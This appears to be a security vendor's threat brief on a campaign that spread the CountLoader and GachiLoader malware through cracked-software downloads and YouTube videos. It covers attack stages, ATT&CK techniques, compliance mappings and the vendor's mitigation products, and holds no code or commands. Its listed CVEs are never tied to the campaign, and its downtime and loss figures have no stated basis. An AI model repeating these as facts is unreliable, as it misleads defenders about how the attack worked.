Executive Summary
In December 2025, researchers revealed a sophisticated dual-campaign where cracked software download sites and compromised YouTube videos were exploited to distribute the CountLoader and GachiLoader malware families. Users seeking pirated software were redirected to malicious downloads delivering CountLoader, a modular loader which enabled persistent access, evasion of antivirus tools, lateral movement, and ultimately delivered infostealer payloads such as ACR Stealer. In parallel, the YouTube Ghost Network used compromised accounts to distribute GachiLoader via fake installer videos, leveraging new techniques for stealth and privilege escalation, and dropping secondary threats such as Rhadamanthys stealer.
These campaigns showcase rising innovation in malware loader design, particularly the use of signed-binary abuse, fileless execution, and exploitation of popular platforms to target unwary users. Such approach not only increases malware payload delivery rates but poses detection challenges for enterprises and individuals alike.
Why This Matters Now
Attackers are increasingly abusing trusted download sources and social channels, leveraging sophisticated loaders with anti-analysis features to bypass detection. The use of modular loaders, novel process injection, and fileless delivery rapidly escalates risk for organizations and individuals, making layered defenses and real-time anomaly detection urgent priorities.
Attack Path Analysis
Attackers initiated compromise via users downloading cracked software and malicious YouTube links, resulting in loader execution on endpoints. Privilege escalation was achieved by attempting to run loaders with elevated privileges and bypassing security tools. Lateral movement occurred as malware propagated through removable drives and executed additional payloads across systems. Command & control was maintained using mshta.exe, PowerShell, and obfuscated URLs to fetch further payloads and instructions. Exfiltration of credentials and sensitive data was performed by info-stealer malware communicating over potentially encrypted or obfuscated channels. The ultimate impact included theft of sensitive information and the potential for broader organizational compromise.
Kill Chain Progression
Initial Compromise
Description
Users were tricked into downloading and executing booby-trapped cracked software installers and malicious links from YouTube, resulting in loader malware execution.
Related CVEs
CVE-2023-23397
CVSS 9.8Microsoft Outlook Elevation of Privilege Vulnerability
Affected Products:
Microsoft Outlook – 2013 SP1, 2016, 2019, 2021, Office 365
Exploit Status:
exploited in the wildCVE-2023-36884
CVSS 8.8Microsoft Office and Windows HTML Remote Code Execution Vulnerability
Affected Products:
Microsoft Office – 2013, 2016, 2019, 2021, Office 365
Microsoft Windows – 10, 11, Server 2016, Server 2019, Server 2022
Exploit Status:
exploited in the wild
MITRE ATT&CK® Techniques
Supply Chain Compromise: Compromise Software Supply Chain
Phishing: Spearphishing via Service
User Execution: Malicious File
Command and Scripting Interpreter: PowerShell
System Binary Proxy Execution: Mshta
Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder
Obfuscated Files or Information
Command and Control over Removable Media
Screen Capture
Exfiltration Over C2 Channel
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Malicious Software Prevention Mechanisms
Control ID: 6.4.3
NYDFS 23 NYCRR 500 – Cybersecurity Policy Implementation
Control ID: 500.03
DORA (Digital Operational Resilience Act) – ICT Risk Management Framework
Control ID: Art. 9
CISA Zero Trust Maturity Model (ZTMM) 2.0 – Proactive Device-based Threat Detection
Control ID: Pillar: Devices – Threat Protection
NIS2 Directive – Incident Handling and Technical Controls
Control ID: Article 21(2)(d),(e)
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Computer Software/Engineering
Infostealer malware targeting cracked software downloads creates severe risk for development environments, potentially compromising source code and intellectual property through CountLoader and GachiLoader infections.
Information Technology/IT
IT infrastructure faces elevated threat from malware loaders exploiting cracked software distribution, requiring enhanced egress security and anomaly detection to prevent data exfiltration and lateral movement.
Financial Services
Information stealers pose critical risk to financial institutions through credential theft and data exfiltration, necessitating zero trust segmentation and encrypted traffic monitoring per compliance requirements.
Health Care / Life Sciences
Healthcare organizations face HIPAA compliance violations from infostealer campaigns targeting software downloads, requiring multicloud visibility and threat detection capabilities to protect patient data integrity.
Sources
- Cracked Software and YouTube Videos Spread CountLoader and GachiLoader Malwarehttps://thehackernews.com/2025/12/cracked-software-and-youtube-videos.htmlVerified
- GachiLoader Deploys Payloads Using Heavily Obfuscated Node.js JavaScript Malware on Infected Machineshttps://cyberpress.org/gachiloader-node-js-javascript-malware/Verified
- CountLoader and GachiLoader Malware Targeting Windows Systems via Cracked Software and YouTube Campaignshttps://www.rescana.com/post/countloader-and-gachiloader-malware-targeting-windows-systems-via-cracked-software-and-youtube-campaVerified
Frequently Asked Questions
Cloud Native Security Fabric Mitigations and ControlsCNSF
Zero Trust segmentation, egress filtering, encrypted traffic control, and threat detection could have significantly reduced the spread, data loss, and stealth tactics used in this multi-stage attack. Implementing CNSF controls would confine malware to compromised hosts, disrupt outbound exfiltration, and increase detection of malicious activity across clouds and distributed networks.
Control: Cloud Firewall (ACF)
Mitigation: Web-based malware delivery is blocked or flagged at the network perimeter.
Control: Threat Detection & Anomaly Response
Mitigation: Privilege misuse or anomalous task scheduling is detected and alerted in real time.
Control: Zero Trust Segmentation
Mitigation: Unauthorized lateral east-west network movements are blocked or rapidly detected.
Control: Egress Security & Policy Enforcement
Mitigation: Outbound connections to unknown or malicious C2 infrastructure are denied.
Control: Encrypted Traffic (HPE)
Mitigation: Sensitive data exfiltration is restricted and encrypted sessions are observable for threat analysis.
Suspicious actions across multiple cloud environments are quickly identified and correlated.
Impact at a Glance
Affected Business Functions
- IT Operations
- Data Security
- Compliance
Estimated downtime: 3 days
Estimated loss: $500,000
Potential exposure of sensitive corporate data, including intellectual property and customer information, due to information-stealing malware deployed by CountLoader and GachiLoader.
Recommended Actions
Key Takeaways & Next Steps
- • Deploy cloud firewalls with URL filtering and threat intelligence to block known malware sites and delivery vectors.
- • Enforce Zero Trust segmentation and microsegmentation to isolate workloads and prevent lateral malware movement.
- • Implement rigorous egress filtering and FQDN policy controls to disrupt C2 and exfiltration paths.
- • Utilize high-performance encryption with observability to secure sensitive data in transit and reveal covert exfiltration attempts.
- • Enable continuous threat detection, anomaly response, and multicloud visibility to detect, alert, and respond to suspicious behaviors rapidly.
